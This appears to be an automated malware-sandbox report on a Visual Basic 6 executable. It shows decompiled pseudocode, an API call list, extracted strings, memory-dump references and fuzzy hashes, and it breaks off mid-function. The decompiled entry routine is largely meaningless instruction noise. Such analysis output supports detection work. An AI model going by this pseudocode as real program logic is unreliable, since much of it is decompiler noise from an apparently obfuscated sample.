				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				intOrPtr* _v244;
				signed int _v248;
				signed int _v252;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr* _v268;
				signed int _v272;
				signed int _v276;
				intOrPtr* _v280;
				signed int _v284;
				signed int _v288;
				void* _t265;
				signed int _t268;
				signed int _t279;
				signed int _t284;
				char* _t288;
				signed int _t294;
				signed int _t299;
				signed int _t307;
				signed int _t312;
				short _t314;
				signed int _t320;
				signed int _t325;
				signed int _t331;
				signed int _t335;
				signed int _t338;
				signed int _t350;
				signed int _t355;
				short _t356;
				signed int _t359;
				char* _t361;
				void* _t391;
				void* _t393;
				signed int* _t394;
				signed int _t401;
				signed int _t419;
				long long _t420;

				_t394 = _t393 - 0xc;
				 *[fs:0x0] = _t394;
				L00401530();
				_v16 = _t394;
				_v12 = 0x401420;
				_v8 = 0;
				_t265 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401536, _t391);
				_push(0x405544);
				L00401746();
				_push(_t265);
				_push( &_v104);
				L004016B6();
				_v144 = 0x405550;
				_v152 = 0x8008;
				_push( &_v104);
				_t268 =  &_v152;
				_push(_t268);
				L00401704();
				_v192 = _t268;
				_t361 =  &_v104;
				L00401794();
				if(_v192 != 0) {
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_t420 =  *0x401408;
					_push(_t361);
					_push(_t361);
					_v80 = _t420;
					asm("fld1");
					_push(_t361);
					_push(_t361);
					_v88 = _t420;
					asm("fld1");
					_push(_t361);
					_push(_t361);
					_v96 = _t420;
					L0040176A();
					_v64 = _t420;
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push(3);
					L004017A0();
					_t394 =  &(_t394[4]);
					if( *0x425698 != 0) {
						_v224 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v224 = 0x425698;
					}
					_v192 =  *_v224;
					_t350 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t350;
					if(_v196 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v228 = _t350;
					}
					_v200 = _v88;
					_t355 =  *((intOrPtr*)( *_v200 + 0x68))(_v200,  &_v188);
					asm("fclex");
					_v204 = _t355;
					if(_v204 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x4050c0);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v232 = _t355;
					}
					_t356 = _v188;
					_v68 = _t356;
					_t361 =  &_v88;
					L0040178E();
					_t419 =  *0x401418;
					L004016B0();
					_t359 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t356);
					asm("fclex");
					_v192 = _t359;
					_t401 = _v192;
					if(_t401 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x404b0c);
						_push(_a4);
						_push(_v192);
						L004017B8();
						_v236 = _t359;
					}
				}
				_v112 = 0x80020004;
				_v120 = 0xa;
				_v96 = 0x80020004;
				_v104 = 0xa;
				_push( &_v120);
				_push( &_v104);
				asm("fld1");
				_push(_t361);
				_push(_t361);
				_v76 = _t419;
				asm("fld1");
				_push(_t361);
				_push(_t361);
				_v84 = _t419;
				asm("fld1");
				_push(_t361);
				_push(_t361);
				 *_t394 = _t419;
				L004016AA();
				L004016EC();
				asm("fcomp qword [0x401410]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t401 == 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_v240 = 1;
				}
				_v192 =  ~_v240;
				_push( &_v120);
				_push( &_v104);
				_push(2);
				L004017A0();
				if(_v192 != 0) {
					if( *0x425698 != 0) {
						_v244 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v244 = 0x425698;
					}
					_v192 =  *_v244;
					_t320 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t320;
					if(_v196 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v248 = _t320;
					}
					_v200 = _v88;
					_t325 =  *((intOrPtr*)( *_v200 + 0x58))(_v200,  &_v84);
					asm("fclex");
					_v204 = _t325;
					if(_v204 >= 0) {
						_v252 = _v252 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x4050c0);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v252 = _t325;
					}
					_v216 = _v84;
					_v84 = _v84 & 0x00000000;
					L00401752();
					L0040178E();
					_v96 = 0x80020004;
					_v104 = 0xa;
					_push( &_v104);
					L004016A4();
					L00401794();
					if( *0x425010 != 0) {
						_v256 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v256 = 0x425010;
					}
					_t331 =  &_v88;
					L004017C4();
					_v192 = _t331;
					_t335 =  *((intOrPtr*)( *_v192 + 0xe8))(_v192,  &_v188, _t331,  *((intOrPtr*)( *((intOrPtr*)( *_v256)) + 0x308))( *_v256));
					asm("fclex");
					_v196 = _t335;
					if(_v196 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x405050);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v260 = _t335;
					}
					_t338 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, _v188);
					asm("fclex");
					_v200 = _t338;
					if(_v200 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x404b0c);
						_push(_a4);
						_push(_v200);
						L004017B8();
						_v264 = _t338;
					}
					L0040178E();
				}
				_push(L"Unerrably");
				_push(L"Icositetrahedra9");
				_push( &_v104); // executed
				L0040169E(); // executed
				_v144 = _v144 & 0x00000000;
				_v152 = 0x8008;
				_push( &_v104);
				_t279 =  &_v152;
				_push(_t279);
				L00401704();
				_v192 = _t279;
				L00401794();
				if(_v192 != 0) {
					_push(0);
					_push(0);
					_push(1);
					L00401698();
					L00401752();
					_v96 = 0x80020004;
					_v104 = 0xa;
					_t314 =  &_v104;
					_push(_t314);
					L0040179A();
					_v56 = _t314;
					L00401794();
					_push(1);
					_push(L"Fluorskyldningernes4");
					L00401692();
				}
				_v144 = L"8/8/8";
				_v152 = 8;
				L004016F8();
				_push( &_v104);
				_push( &_v120);
				L0040168C();
				_v160 = 8;
				_v168 = 0x8002;
				_push( &_v120);
				_t284 =  &_v168;
				_push(_t284);
				L00401704();
				_v192 = _t284;
				_push( &_v120);
				_push( &_v104);
				_push(2);
				L004017A0();
				if(_v192 != 0) {
					_push( &_v104);
					L004016E0();
					L00401764();
					if( *0x425698 != 0) {
						_v268 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v268 = 0x425698;
					}
					_v192 =  *_v268;
					_t307 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t307;
					if(_v196 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v272 = _t307;
					}
					_v200 = _v88;
					_t312 =  *((intOrPtr*)( *_v200 + 0xc0))(_v200,  &_v188);
					asm("fclex");
					_v204 = _t312;
					if(_v204 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x4050c0);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v276 = _t312;
					}
					_v52 = _v188;
					L0040178E();
					_push(L"NEDGRAVEDES");
					L00401686();
				}
				_t288 = 0;
				if(0 != 0) {
					L00401680();
					if( *0x425698 != 0) {
						_v280 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v280 = 0x425698;
					}
					_v192 =  *_v280;
					_t294 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t294;
					if(_v196 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v284 = _t294;
					}
					_v200 = _v88;
					_t299 =  *((intOrPtr*)( *_v200 + 0xe0))(_v200,  &_v84);
					asm("fclex");
					_v204 = _t299;
					if(_v204 >= 0) {
						_v288 = _v288 & 0x00000000;
					} else {
						_push(0xe0);
						_push(0x4050c0);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v288 = _t299;
					}
					_v220 = _v84;
					_v84 = _v84 & 0x00000000;
					L00401752();
					L0040178E();
					_v144 = L"ANALCIMIC";
					_v152 = 8;
					L004016F8();
					_push(2);
					_t288 =  &_v104;
					_push(_t288);
					L0040167A();
					_v76 = _t419;
					L00401794();
				}
				asm("wait");
				_push(0x418dc0);
				L00401740();
				L00401794();
				L00401740();
				L00401740();
				return _t288;
			}

0x004184f9
0x00418508
0x00418514
0x0041851c
0x0041851f
0x00418526
0x00418535
0x00418538
0x0041853d
0x00418542
0x00418546
0x00418547
0x0041854c
0x00418556
0x00418563
0x00418564
0x0041856a
0x0041856b
0x00418570
0x00418577
0x0041857a
0x00418588
0x0041858e
0x00418595
0x0041859f
0x004185a6
0x004185ad
0x004185b4
0x004185c1
0x004185c5
0x004185c9
0x004185ca
0x004185d0
0x004185d1
0x004185d2
0x004185d5
0x004185d7
0x004185d8
0x004185d9
0x004185dc
0x004185de
0x004185df
0x004185e0
0x004185e3
0x004185e8
0x004185f1
0x004185f5
0x004185f9
0x004185fa
0x004185fc
0x00418601
0x0041860b
0x00418628
0x0041860d
0x0041860d
0x00418612
0x00418617
0x0041861c
0x0041861c
0x0041863a
0x00418652
0x00418655
0x00418657
0x00418664
0x00418686
0x00418666
0x00418666
0x00418668
0x0041866d
0x00418673
0x00418679
0x0041867e
0x0041867e
0x00418690
0x004186ab
0x004186ae
0x004186b0
0x004186bd
0x004186df
0x004186bf
0x004186bf
0x004186c1
0x004186c6
0x004186cc
0x004186d2
0x004186d7
0x004186d7
0x004186e6
0x004186ed
0x004186f1
0x004186f4
0x004186f9
0x004186ff
0x0041870d
0x00418710
0x00418712
0x00418718
0x0041871f
0x0041873e
0x00418721
0x00418721
0x00418723
0x00418728
0x0041872b
0x00418731
0x00418736
0x00418736
0x0041871f
0x00418745
0x0041874c
0x00418753
0x0041875a
0x00418764
0x00418768
0x00418769
0x0041876b
0x0041876c
0x0041876d
0x00418770
0x00418772
0x00418773
0x00418774
0x00418777
0x00418779
0x0041877a
0x0041877b
0x0041877e
0x00418783
0x00418788
0x0041878e
0x00418790
0x00418791
0x0041879f
0x00418793
0x00418793
0x00418793
0x004187ae
0x004187b8
0x004187bc
0x004187bd
0x004187bf
0x004187d0
0x004187dd
0x004187fa
0x004187df
0x004187df
0x004187e4
0x004187e9
0x004187ee
0x004187ee
0x0041880c
0x00418824
0x00418827
0x00418829
0x00418836
0x00418858
0x00418838
0x00418838
0x0041883a
0x0041883f
0x00418845
0x0041884b
0x00418850
0x00418850
0x00418862
0x0041887a
0x0041887d
0x0041887f
0x0041888c
0x004188ae
0x0041888e
0x0041888e
0x00418890
0x00418895
0x0041889b
0x004188a1
0x004188a6
0x004188a6
0x004188b8
0x004188be
0x004188cb
0x004188d3
0x004188d8
0x004188df
0x004188e9
0x004188ea
0x004188f2
0x004188fe
0x0041891b
0x00418900
0x00418900
0x00418905
0x0041890a
0x0041890f
0x0041890f
0x0041893f
0x00418943
0x00418948
0x00418963
0x00418969
0x0041896b
0x00418978
0x0041899d
0x0041897a
0x0041897a
0x0041897f
0x00418984
0x0041898a
0x00418990
0x00418995
0x00418995
0x004189b2
0x004189b8
0x004189ba
0x004189c7
0x004189e9
0x004189c9
0x004189c9
0x004189ce
0x004189d3
0x004189d6
0x004189dc
0x004189e1
0x004189e1
0x004189f3
0x004189f3
0x004189f8
0x004189fd
0x00418a05
0x00418a06
0x00418a0b
0x00418a12
0x00418a1f
0x00418a20
0x00418a26
0x00418a27
0x00418a2c
0x00418a36
0x00418a44
0x00418a46
0x00418a48
0x00418a4a
0x00418a4c
0x00418a56
0x00418a5b
0x00418a62
0x00418a69
0x00418a6c
0x00418a6d
0x00418a72
0x00418a79
0x00418a7e
0x00418a80
0x00418a85
0x00418a85
0x00418a8a
0x00418a94
0x00418aa7
0x00418aaf
0x00418ab3
0x00418ab4
0x00418ab9
0x00418ac3
0x00418ad0
0x00418ad1
0x00418ad7
0x00418ad8
0x00418add
0x00418ae7
0x00418aeb
0x00418aec
0x00418aee
0x00418aff
0x00418b08
0x00418b09
0x00418b14
0x00418b20
0x00418b3d
0x00418b22
0x00418b22
0x00418b27
0x00418b2c
0x00418b31
0x00418b31
0x00418b4f
0x00418b67
0x00418b6a
0x00418b6c
0x00418b79
0x00418b9b
0x00418b7b
0x00418b7b
0x00418b7d
0x00418b82
0x00418b88
0x00418b8e
0x00418b93
0x00418b93
0x00418ba5
0x00418bc0
0x00418bc6
0x00418bc8
0x00418bd5
0x00418bfa
0x00418bd7
0x00418bd7
0x00418bdc
0x00418be1
0x00418be7
0x00418bed
0x00418bf2
0x00418bf2
0x00418c08
0x00418c0f
0x00418c14
0x00418c19
0x00418c19
0x00418c1e
0x00418c22
0x00418c28
0x00418c34
0x00418c51
0x00418c36
0x00418c36
0x00418c3b
0x00418c40
0x00418c45
0x00418c45
0x00418c63
0x00418c7b
0x00418c7e
0x00418c80
0x00418c8d
0x00418caf
0x00418c8f
0x00418c8f
0x00418c91
0x00418c96
0x00418c9c
0x00418ca2
0x00418ca7
0x00418ca7
0x00418cb9
0x00418cd1
0x00418cd7
0x00418cd9
0x00418ce6
0x00418d0b
0x00418ce8
0x00418ce8
0x00418ced
0x00418cf2
0x00418cf8
0x00418cfe
0x00418d03
0x00418d03
0x00418d15
0x00418d1b
0x00418d28
0x00418d30
0x00418d35
0x00418d3f
0x00418d52
0x00418d57
0x00418d59
0x00418d5c
0x00418d5d
0x00418d62
0x00418d68
0x00418d68
0x00418d6d
0x00418d6e
0x00418da2
0x00418daa
0x00418db2
0x00418dba
0x00418dbf

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00418514
__vbaI4Str.MSVBVM60(00405544,?,?,?,?,00401536), ref: 0041853D
#698.MSVBVM60(?,00000000,00405544,?,?,?,?,00401536), ref: 00418547
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041856B
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041857A
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A,00008008,?), ref: 004185E3
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A,00008008,?), ref: 004185FC
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,00401536), ref: 00418617
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00418679
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000068), ref: 004186D2
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000068), ref: 004186F4
__vbaFpI4.MSVBVM60(00000000,?,004050C0,00000068), ref: 004186FF
__vbaHresultCheckObj.MSVBVM60(00000000,00401420,00404B0C,00000064), ref: 00418731
#679.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,00008008,?), ref: 0041877E
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,00008008,?), ref: 00418783
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 004187BF
__vbaNew2.MSVBVM60(00405090,00425698,?,?,00401536), ref: 004187E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 0041884B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000058), ref: 004188A1
__vbaStrMove.MSVBVM60(00000000,?,004050C0,00000058), ref: 004188CB
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000058), ref: 004188D3
#594.MSVBVM60(0000000A), ref: 004188EA
__vbaFreeVar.MSVBVM60(0000000A), ref: 004188F2
__vbaNew2.MSVBVM60(00404370,00425010,0000000A), ref: 0041890A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418943
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000E8), ref: 00418990
__vbaHresultCheckObj.MSVBVM60(00000000,00401420,00404B0C,00000254), ref: 004189DC
__vbaFreeObj.MSVBVM60(00000000,00401420,00404B0C,00000254), ref: 004189F3
#692.MSVBVM60(?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418A06
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00418A27
__vbaFreeVar.MSVBVM60(00008008,?), ref: 00418A36
#706.MSVBVM60(00000001,00000000,00000000,00008008,?), ref: 00418A4C
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,00008008,?), ref: 00418A56
#648.MSVBVM60(0000000A,00000001,00000000,00000000,00008008,?), ref: 00418A6D
__vbaFreeVar.MSVBVM60(0000000A,00000001,00000000,00000000,00008008,?), ref: 00418A79
#580.MSVBVM60(Fluorskyldningernes4,00000001,0000000A,00000001,00000000,00000000,00008008,?), ref: 00418A85
__vbaVarDup.MSVBVM60(00008008,?), ref: 00418AA7
#542.MSVBVM60(?,?,00008008,?), ref: 00418AB4
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,00008008,?), ref: 00418AD8
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,00008008,?), ref: 00418AEE
#546.MSVBVM60(?,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418B09
__vbaVarMove.MSVBVM60(?,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418B14
__vbaNew2.MSVBVM60(00405090,00425698,?,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418B2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00418B8E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000C0), ref: 00418BED
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,000000C0), ref: 00418C0F
#531.MSVBVM60(NEDGRAVEDES), ref: 00418C19
#598.MSVBVM60(?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418C28
__vbaNew2.MSVBVM60(00405090,00425698,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418C40
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00418CA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418CFE
__vbaStrMove.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418D28
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418D30
__vbaVarDup.MSVBVM60(00000000,?,004050C0,000000E0), ref: 00418D52
#600.MSVBVM60(?,00000002), ref: 00418D5D
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00418D68
__vbaFreeStr.MSVBVM60(00418DC0,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418DA2
__vbaFreeVar.MSVBVM60(00418DC0,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418DAA
__vbaFreeStr.MSVBVM60(00418DC0,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418DB2
__vbaFreeStr.MSVBVM60(00418DC0,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418DBA

Strings

Fluorskyldningernes4, xrefs: 00418A80
8/8/8, xrefs: 00418A8A
Unerrably, xrefs: 004189F8
NEDGRAVEDES, xrefs: 00418C14
Icositetrahedra9, xrefs: 004189FD

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$List$#531#542#546#580#594#598#600#648#679#680#692#698#706Chkstk
String ID: 8/8/8$Fluorskyldningernes4$Icositetrahedra9$NEDGRAVEDES$Unerrably
API String ID: 1573628273-1845448072
Opcode ID: 3660633ffbe1d09d99b37efe001adf018745d631dfc552299c6d4600e848b1e4
Instruction ID: 14a3c95a0f22044a8c2470fad5739af68d28461a6cc30a41136b5dbfadfe5059
Opcode Fuzzy Hash: 3660633ffbe1d09d99b37efe001adf018745d631dfc552299c6d4600e848b1e4
Instruction Fuzzy Hash: 6832E670901228DFEB20EF91CD45FDDB7B5BB04304F5085AAE109B72A1DB785A89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004017E8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(signed int __eax, signed int __ebx, signed char __ecx, signed char __edx, intOrPtr* __edi, intOrPtr* __esi) {
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed char _t98;
				signed char _t99;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t105;
				intOrPtr* _t107;
				signed char _t108;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t112;
				signed int _t113;
				signed char _t115;
				signed int _t116;
				intOrPtr* _t117;
				signed char _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t134;
				signed char _t135;
				signed char _t139;
				signed int _t140;
				signed char _t141;
				intOrPtr* _t144;
				void* _t145;
				signed char _t147;
				signed char _t148;
				intOrPtr* _t149;
				void* _t151;
				signed char _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				signed int _t156;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t167;
				signed char _t168;
				intOrPtr _t169;
				signed char _t174;
				intOrPtr _t178;
				signed int _t180;
				intOrPtr _t186;

				_t155 = __esi;
				_t153 = __edi;
				_t152 = __edx;
				_t147 = __ecx;
				_t140 = __ebx;
				_push("VB5!6&*"); // executed
				L004017E2(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t94 = __eax + 1;
				 *_t94 =  *_t94 + _t94;
				 *_t94 =  *_t94 + _t94;
				 *_t94 =  *_t94 + _t94;
				 *__edx =  *__edx + __edx;
				while(1) {
					_t141 = _t140 ^  *(_t156 - 0x1f0bf89f);
					_t156 = _t156 - 1;
					 *(_t152 - 0x7cf2a144) = _t147;
					_t95 = _t94 +  *0;
					 *_t95 =  *_t95 + _t95;
					 *_t95 =  *_t95 + _t95;
					 *_t95 =  *_t95 + _t95;
					 *_t95 =  *_t95 + _t95;
					asm("fcomp st0, st7");
					asm("sbb eax, [ebx]");
					_push(_t95);
					if( *_t95 < 0) {
						break;
					}
					_push(0x65);
					asm("arpl [ecx+esi], si");
					 *_t147 =  *_t147 | _t95;
					 *_t95 =  *_t95 & _t147;
					_t151 = _t147 + 1;
					 *_t95 =  *_t95 + _t95;
					 *_t95 =  *_t95 + _t95;
					_t140 = _t141 + _t141;
					_t159 = _t159 - 1;
					 *_t95 =  *_t95 ^ _t95;
					_t94 = _t95 + 0xffffffffe18115f4;
					 *(_t151 - 0x4a) = _t94;
					_push(es);
					 *(_t156 - 0x1c) =  *(_t156 - 0x1c) ^ _t156;
					_t147 = _t151 + 1;
					if(_t147 < 0) {
						continue;
					} else {
						_t147 =  *(_t140 + 0x5f);
						_t155 = _t155 - 1;
						asm("clc");
						asm("retf");
						_t156 = _t156 - 1;
						asm("adc dword [edi-0x48], 0x76");
						asm("adc [0x4f3a912e], bl");
						asm("lodsd");
						_t139 = _t94;
						asm("stosb");
						 *((intOrPtr*)(_t139 - 0x2d)) =  *((intOrPtr*)(_t139 - 0x2d)) + _t139;
						_t95 = _t140 ^  *(_t147 - 0x48ee309a);
						_t141 = _t139;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						 *_t95 =  *_t95 + _t95;
						_pop(ss);
						 *_t95 =  *_t95 + _t95;
						 *((intOrPtr*)(_t95 + _t95)) =  *((intOrPtr*)(_t95 + _t95)) + _t152;
					}
					break;
				}
				 *_t95 =  *_t95 + _t95;
				 *_t95 =  *_t95 + _t95;
				_t96 = _t95;
				_t167 = _t96;
				if(_t167 != 0) {
					L16:
					_t156 = _t156 +  *_t153;
					 *_t96 =  *_t96 + _t96;
					 *_t152 =  *_t152 + _t96;
					 *_t96 =  *_t96 | _t96;
					_t141 = _t141 + _t141 + 1;
					goto L17;
				} else {
					if(_t167 >= 0) {
						L15:
						 *_t96 =  *_t96 + _t96;
						goto L16;
					} else {
						asm("outsb");
						if(_t167 < 0) {
							L17:
							asm("outsd");
							asm("insd");
							asm("insd");
							asm("popad");
							asm("outsb");
							 *[fs:eax] =  *[fs:eax] ^ _t96;
							_t98 = _t96 + 0x00000001 | 0x6e617300;
							_t174 = _t98;
							goto L18;
						} else {
							asm("outsb");
							asm("a16 jb 0x4");
							_t98 = _t96 | 0x54000d01;
							_t168 = _t98;
							asm("popad");
							if(_t168 < 0) {
								L19:
								asm("popad");
								asm("a16 outsd");
								asm("a16 gs outsb");
								goto L20;
							} else {
								if(_t168 < 0) {
									L18:
									 *((intOrPtr*)(_t141 + 0x61)) =  *((intOrPtr*)(_t141 + 0x61)) + _t152;
									asm("outsb");
									asm("a16 jo 0x67");
									goto L19;
								} else {
									asm("outsb");
									if(_t168 >= 0) {
										L20:
										asm("outsb");
										if (_t174 >= 0) goto L21;
										_t99 = _t98 + 0x10;
										goto L22;
									} else {
										_t156 =  *(_t155 + 0x67) * 0x1190035;
										 *_t152 =  *_t152 + _t98;
										_t99 = _t98 &  *_t147 & 0x0000000d;
										_t14 = _t147 + 0x72;
										 *_t14 =  *((intOrPtr*)(_t147 + 0x72)) + _t152;
										_t169 =  *_t14;
										asm("insd");
										if(_t169 < 0) {
											L23:
											asm("adc [ebx], eax");
											_t141 = _t141 + _t141 +  *((intOrPtr*)(_t99 + _t99));
											 *_t99 =  *_t99 + _t99;
											_t100 = _t99 +  *_t155;
											 *((intOrPtr*)(_t141 + 0x6c)) =  *((intOrPtr*)(_t141 + 0x6c)) + _t100;
										} else {
											asm("outsb");
											if(_t169 < 0) {
												_t156 =  *(_t155 + 0x67) * 0xa5350035;
												asm("adc eax, [eax]");
												_t99 = _t99 + _t141;
												asm("sbb [eax], al");
												_t152 = _t152 + _t99;
												asm("adc eax, [eax]");
												 *_t141 =  *_t141 + _t141;
												asm("sbb al, 0x0");
												 *((intOrPtr*)(_t99 + _t99 + 0x46)) =  *((intOrPtr*)(_t99 + _t99 + 0x46)) + _t99;
												_t153 = _t153 + _t153;
												 *_t152 =  *_t152 + _t141;
												 *_t99 =  *_t99 + _t99;
												 *_t147 =  *_t147 + _t99;
												_push(es);
												_t21 = _t147 + 0x6d + _t156 * 2;
												 *_t21 =  *((intOrPtr*)(_t147 + 0x6d + _t156 * 2)) + _t152;
												if( *_t21 >= 0) {
													 *_t141 =  *_t141 + _t147;
													_pop(es);
													asm("bound eax, [ebx]");
													 *_t99 =  *_t99 + _t99;
													 *_t141 =  *_t141 | _t99;
													_pop(es);
													goto L15;
												}
												L22:
												asm("adc [esi], cl");
												asm("rol byte [ebx], 0x17");
												_pop(es);
												asm("fild word [edx]");
												goto L23;
											}
										}
									}
								}
							}
						}
					}
				}
				_t144 = _t141 + 1;
				asm("insb");
				asm("outsd");
				if(_t144 >= 0) {
					L31:
					_t101 = _t100 +  *((intOrPtr*)(_t155 + _t100));
					 *_t101 =  *_t101 + _t101;
					_t102 = _t101 + _t147;
					asm("arpl [eax], ax");
					_pop(es);
					 *_t102 =  *_t102 + _t102;
					_t154 = _t153 - 1;
					_t104 = _t102 + _t102 + 1;
					 *_t154 =  *_t154 + _t104;
					 *_t104 =  *_t104 + _t104;
					 *((intOrPtr*)(_t104 + 0x700404f)) =  *((intOrPtr*)(_t104 + 0x700404f)) + _t152;
					 *_t104 =  *_t104 + _t104;
					 *_t104 =  *_t104 + _t152;
					_t153 = _t154 - 1;
					_t105 = _t104 + 1;
					 *_t153 =  *_t153 + _t105;
					 *_t105 =  *_t105 + _t105;
					_t155 = _t155 - 1;
					_t107 = _t105 + _t144 + 1;
					 *_t153 =  *_t153 + _t107;
					 *_t107 =  *_t107 + _t107;
					 *((intOrPtr*)(_t107 + 0x700404e)) =  *((intOrPtr*)(_t107 + 0x700404e)) + _t144;
					goto L32;
				} else {
